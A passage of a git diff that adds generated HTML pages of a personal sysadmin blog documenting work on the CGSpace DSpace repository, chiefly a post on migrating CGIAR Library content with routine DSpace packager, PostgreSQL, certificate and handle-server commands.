+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/notes/page/8/index.html b/docs/categories/notes/page/8/index.html
new file mode 100644
index 000000000..0c489ffc4
--- /dev/null
+++ b/docs/categories/notes/page/8/index.html
@@ -0,0 +1,237 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-11/">November, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-11-02T09:37:54+02:00">Thu Nov 02, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-11-01">2017-11-01</h2>
+<ul>
+<li>The CORE developers responded to say they are looking into their bot not respecting our robots.txt</li>
+</ul>
+<h2 id="2017-11-02">2017-11-02</h2>
+<ul>
+<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
+0
+</code></pre><ul>
+<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-10/">October, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-10-01T08:07:54+03:00">Sun Oct 01, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2017-10-01">2017-10-01</h2>
+<ul>
+<li>Peter emailed to point out that many items in the <a href="https://cgspace.cgiar.org/handle/10568/2703">ILRI archive collection</a> have multiple handles:</li>
+</ul>
+<pre tabindex="0"><code>http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+</code></pre><ul>
+<li>There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine</li>
+<li>Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgiar-library-migration/">CGIAR Library Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-09-18T16:38:35+03:00">Mon Sep 18, 2017</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgiar-library-migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/7/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary disabled" href="#" role="button" aria-disabled="true">Next page</a>
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/page/1/index.html b/docs/categories/page/1/index.html
new file mode 100644
index 000000000..7cf6bb00c
--- /dev/null
+++ b/docs/categories/page/1/index.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en-us">
+  <head>
+    <title>https://alanorth.github.io/cgspace-notes/categories/</title>
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/">
+    <meta name="robots" content="noindex">
+    <meta charset="utf-8">
+    <meta http-equiv="refresh" content="0; url=https://alanorth.github.io/cgspace-notes/categories/">
+  </head>
+</html>
diff --git a/docs/cgiar-library-migration/index.html b/docs/cgiar-library-migration/index.html
new file mode 100644
index 000000000..65d912cfd
--- /dev/null
+++ b/docs/cgiar-library-migration/index.html
@@ -0,0 +1,336 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGIAR Library Migration" />
+<meta property="og:description" content="Notes on the migration of the CGIAR Library to CGSpace" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/cgiar-library-migration/" />
+<meta property="article:published_time" content="2017-09-18T16:38:35+03:00" />
+<meta property="article:modified_time" content="2019-10-28T13:40:20+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGIAR Library Migration"/>
+<meta name="twitter:description" content="Notes on the migration of the CGIAR Library to CGSpace"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "CGIAR Library Migration",
+  "url": "https://alanorth.github.io/cgspace-notes/cgiar-library-migration/",
+  "wordCount": "1278",
+  "datePublished": "2017-09-18T16:38:35+03:00",
+  "dateModified": "2019-10-28T13:40:20+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes, Migration",
+  "description": "Notes on the migration of the CGIAR Library to CGSpace"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/cgiar-library-migration/">
+
+    <title>CGIAR Library Migration | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgiar-library-migration/">CGIAR Library Migration</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-09-18T16:38:35+03:00">Mon Sep 18, 2017</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called <em>CGIAR System Organization</em>.</p>
+<h2 id="pre-migration-technical-todos">Pre-migration Technical TODOs</h2>
+<p>Things that need to happen before the migration:</p>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Create top-level community on CGSpace to hold the CGIAR Library content: <code>10568/83389</code>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Update nginx redirects in ansible templates</li>
+<li><input checked="" disabled="" type="checkbox"> Update handle in DSpace XMLUI config</li>
+</ul>
+</li>
+<li>Set up nginx redirects for URLs like:
+<ul>
+<li><input checked="" disabled="" type="checkbox"> <a href="https://library.cgiar.org/bitstream/handle/10947/2699/CGIAR_Branding_Guidelines_and_Toolkit.pdf">https://library.cgiar.org/bitstream/handle/10947/2699/CGIAR_Branding_Guidelines_and_Toolkit.pdf</a></li>
+<li><input checked="" disabled="" type="checkbox"> <a href="https://library.cgiar.org/handle/10947/4258">https://library.cgiar.org/handle/10947/4258</a></li>
+</ul>
+</li>
+<li><input checked="" disabled="" type="checkbox"> Merge <a href="https://github.com/ilri/DSpace/pull/339">#339</a> to <code>5_x-prod</code> branch and rebuild DSpace</li>
+<li><input checked="" disabled="" type="checkbox"> Increase <code>max_connections</code> in <code>/etc/postgresql/9.5/main/postgresql.conf</code> by ~10
+<ul>
+<li><code>SELECT * FROM pg_stat_activity;</code> seems to show ~6 extra connections used by the command line tools during import</li>
+</ul>
+</li>
+<li><input checked="" disabled="" type="checkbox"> Temporarily disable nightly <code>index-discovery</code> cron job because the import process will be taking place during some of this time and I don&rsquo;t want them to be competing to update the Solr index</li>
+<li><input checked="" disabled="" type="checkbox"> Copy HTTPS certificate key pair from CGIAR Library server&rsquo;s Tomcat keystore:</li>
+</ul>
+<pre tabindex="0"><code>$ keytool -list -keystore tomcat.keystore
+$ keytool -importkeystore -srckeystore tomcat.keystore -destkeystore library.cgiar.org.p12 -deststoretype PKCS12 -srcalias tomcat
+$ openssl pkcs12 -in library.cgiar.org.p12 -nokeys -out library.cgiar.org.crt.pem
+$ openssl pkcs12 -in library.cgiar.org.p12 -nodes -nocerts -out library.cgiar.org.key.pem
+$ wget https://certs.godaddy.com/repository/gdroot-g2.crt https://certs.godaddy.com/repository/gdig2.crt.pem
+$ cat library.cgiar.org.crt.pem gdig2.crt.pem &gt; library.cgiar.org-chained.pem
+</code></pre><h2 id="migration-process">Migration Process</h2>
+<p><strong>Export all top-level communities and collections from DSpace Test:</strong></p>
+<pre tabindex="0"><code>$ export PATH=$PATH:/home/dspacetest.cgiar.org/bin
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2515 10947-2515/10947-2515.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2516 10947-2516/10947-2516.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2517 10947-2517/10947-2517.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2518 10947-2518/10947-2518.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2519 10947-2519/10947-2519.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2708 10947-2708/10947-2708.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2526 10947-2526/10947-2526.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2871 10947-2871/10947-2871.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/2527 10947-2527/10947-2527.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10568/93759 10568-93759/10568-93759.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10568/93760 10568-93760/10568-93760.zip
+$ dspace packager -d -a -t AIP -e aorth@mjanja.ch -i 10947/1 10947-1/10947-1.zip
+</code></pre><p><strong>Import to CGSpace (also see <a href="http://alanorth.github.io/cgspace-notes/2017-05/#2017-05-10">notes from 2017-05-10</a>):</strong></p>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Copy all exports from DSpace Test</li>
+<li><input checked="" disabled="" type="checkbox"> Add ingestion overrides to <code>dspace.cfg</code> before import:</li>
+</ul>
+<pre tabindex="0"><code>mets.dspaceAIP.ingest.crosswalk.METSRIGHTS = NIL
+mets.dspaceAIP.ingest.crosswalk.DSPACE-ROLES = NIL
+</code></pre><ul>
+<li><input checked="" disabled="" type="checkbox"> Import communities and collections, paying attention to options to skip missing parents and ignore handles:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
+$ export PATH=$PATH:/home/cgspace.cgiar.org/bin
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2515/10947-2515.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2516/10947-2516.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2517/10947-2517.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2518/10947-2518.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2519/10947-2519.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2708/10947-2708.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2526/10947-2526.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2871/10947-2871.zip
+$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-4467/10947-4467.zip
+$ dspace packager -s -u -t AIP -o ignoreHandle=false -e aorth@mjanja.ch -p 10568/83389 10947-2527/10947-2527.zip
+$ for item in 10947-2527/ITEM@10947-*; do dspace packager -r -f -u -t AIP -e aorth@mjanja.ch $item; done
+$ dspace packager -s -t AIP -o ignoreHandle=false -e aorth@mjanja.ch -p 10568/83389 10947-1/10947-1.zip
+$ for collection in 10947-1/COLLECTION@10947-*; do dspace packager -s -o ignoreHandle=false -t AIP -e aorth@mjanja.ch -p 10947/1 $collection; done
+$ for item in 10947-1/ITEM@10947-*; do dspace packager -r -f -u -t AIP -e aorth@mjanja.ch $item; done
+</code></pre><p>This submits AIP hierarchies recursively (-r) and suppresses errors when an item&rsquo;s parent collection hasn&rsquo;t been created yet—for example, if the item is mapped. The large historic archive (10947/1) is created in several steps because it requires a lot of memory and often crashes.</p>
+<p><strong>Create new subcommunities and collections for content we reorganized into new hierarchies from the original:</strong></p>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Create <em>CGIAR System Management Board</em> sub-community: <code>10568/83536</code>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Content from <em>CGIAR System Management Board documents</em> collection (<code>10947/4561</code>) goes here</li>
+<li>Import collection hierarchy first and then the items:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace packager -r -t AIP -o ignoreHandle=false -e aorth@mjanja.ch -p 10568/83536 10568-93760/COLLECTION@10947-4651.zip
+$ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e aorth@mjanja.ch $item; done
+</code></pre><ul>
+<li><input checked="" disabled="" type="checkbox"> Create <em>CGIAR System Management Office</em> sub-community: <code>10568/83537</code>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Create <em>CGIAR System Management Office documents</em> collection: <code>10568/83538</code></li>
+<li>Import items to collection individually in replace mode (-r) while explicitly preserving handles and ignoring parents:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ for item in 10568-93759/ITEM@10947-46*; do dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/83538 $item; done
+</code></pre><p><strong>Get the handles for the last few items from CGIAR Library that were created since we did the migration to DSpace Test in May:</strong></p>
+<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;);
+</code></pre><ul>
+<li>Export them from the CGIAR Library:</li>
+</ul>
+<pre tabindex="0"><code># for handle in 10947/4658 10947/4659 10947/4660 10947/4661 10947/4665 10947/4664 10947/4666 10947/4669; do /usr/local/dspace/bin/dspace packager -d -a -t AIP -e m.marus@cgiar.org -i $handle ${handle}.zip; done
+</code></pre><ul>
+<li>Import on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ for item in 10947-latest/*.zip; do dspace packager -r -u -t AIP -e aorth@mjanja.ch $item; done
+</code></pre><h2 id="post-migration">Post Migration</h2>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Shut down Tomcat and run <code>update-sequences.sql</code> as the system&rsquo;s <code>postgres</code> user</li>
+<li><input checked="" disabled="" type="checkbox"> Remove ingestion overrides from <code>dspace.cfg</code></li>
+<li><input checked="" disabled="" type="checkbox"> Reset PostgreSQL <code>max_connections</code> to 183</li>
+<li><input checked="" disabled="" type="checkbox"> Enable nightly <code>index-discovery</code> cron job</li>
+<li><input checked="" disabled="" type="checkbox"> Adjust CGSpace&rsquo;s <code>handle-server/config.dct</code> to add the new prefix alongside our existing 10568, ie:</li>
+</ul>
+<pre tabindex="0"><code>&#34;server_admins&#34; = (
+&#34;300:0.NA/10568&#34;
+&#34;300:0.NA/10947&#34;
+)
+
+&#34;replication_admins&#34; = (
+&#34;300:0.NA/10568&#34;
+&#34;300:0.NA/10947&#34;
+)
+
+&#34;backup_admins&#34; = (
+&#34;300:0.NA/10568&#34;
+&#34;300:0.NA/10947&#34;
+)
+</code></pre><p>I had been regenerated the <code>sitebndl.zip</code> file on the CGIAR Library server and sent it to the Handle.net admins but they said that there were mismatches between the public and private keys, which I suspect is due to <code>make-handle-config</code> not being very flexible. After discussing our scenario with the Handle.net admins they said we actually don&rsquo;t need to send an updated <code>sitebndl.zip</code> for this type of change, and the above <code>config.dct</code> edits are all that is required. I guess they just did something on their end by setting the authoritative IP address for the 10947 prefix to be the same as ours&hellip;</p>
+<ul>
+<li><input checked="" disabled="" type="checkbox"> Update DNS records:
+<ul>
+<li>CNAME: cgspace.cgiar.org</li>
+</ul>
+</li>
+<li><input checked="" disabled="" type="checkbox"> Re-deploy DSpace from freshly built <code>5_x-prod</code> branch</li>
+<li><input checked="" disabled="" type="checkbox"> Merge <code>cgiar-library</code> branch to <code>master</code> and re-run ansible nginx templates</li>
+<li><input checked="" disabled="" type="checkbox"> Run system updates and reboot server</li>
+<li><input checked="" disabled="" type="checkbox"> Switch to Let&rsquo;s Encrypt HTTPS certificates (after DNS is updated and server isn&rsquo;t busy):</li>
+</ul>
+<pre tabindex="0"><code>$ sudo systemctl stop nginx
+$ /opt/certbot-auto certonly --standalone -d library.cgiar.org
+$ sudo systemctl start nginx
+</code></pre><h2 id="troubleshooting">Troubleshooting</h2>
+<h3 id="foreign-key-error-in-dspace-cleanup">Foreign Key Error in <code>dspace cleanup</code></h3>
+<p>The cleanup script is sometimes used during import processes to clean the database and assetstore after failed AIP imports. If you see the following error with <code>dspace cleanup -v</code>:</p>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;                                                                                                                       
+  Detail: Key (bitstream_id)=(119841) is still referenced from table &#34;bundle&#34;.
+</code></pre><p>The solution is to set the <code>primary_bitstream_id</code> to NULL in PostgreSQL:</p>
+<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (119841);
+</code></pre><h3 id="psqlexception-during-aip-ingest">PSQLException During AIP Ingest</h3>
+<p>After a few rounds of ingesting—possibly with failures—you might end up with inconsistent IDs in the database. In this case, during AIP ingest of a single collection in submit mode (-s):</p>
+<pre tabindex="0"><code>org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34;                                    
+  Detail: Key (handle_id)=(86227) already exists.
+</code></pre><p>The normal solution is to run the <code>update-sequences.sql</code> script (with Tomcat shut down) but it doesn&rsquo;t seem to work in this case. Finding the maximum <code>handle_id</code> and manually updating the sequence seems to work:</p>
+<pre tabindex="0"><code>dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
+dspace=# select setval(&#39;handle_seq&#39;,86873);
+</code></pre>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/cgspace-cgcorev2-migration/index.html b/docs/cgspace-cgcorev2-migration/index.html
new file mode 100644
index 000000000..e3607f543
--- /dev/null
+++ b/docs/cgspace-cgcorev2-migration/index.html
@@ -0,0 +1,521 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace CG Core v2 Migration" />
+<meta property="og:description" content="Possible changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2." />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/" />
+<meta property="article:published_time" content="2021-02-21T13:27:35+02:00" />
+<meta property="article:modified_time" content="2021-09-21T12:46:34+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace CG Core v2 Migration"/>
+<meta name="twitter:description" content="Possible changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "CGSpace CG Core v2 Migration",
+  "url": "https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/",
+  "wordCount": "579",
+  "datePublished": "2021-02-21T13:27:35+02:00",
+  "dateModified": "2021-09-21T12:46:34+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes, Migration",
+  "description": "Possible changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2."
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/">
+
+    <title>CGSpace CG Core v2 Migration | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
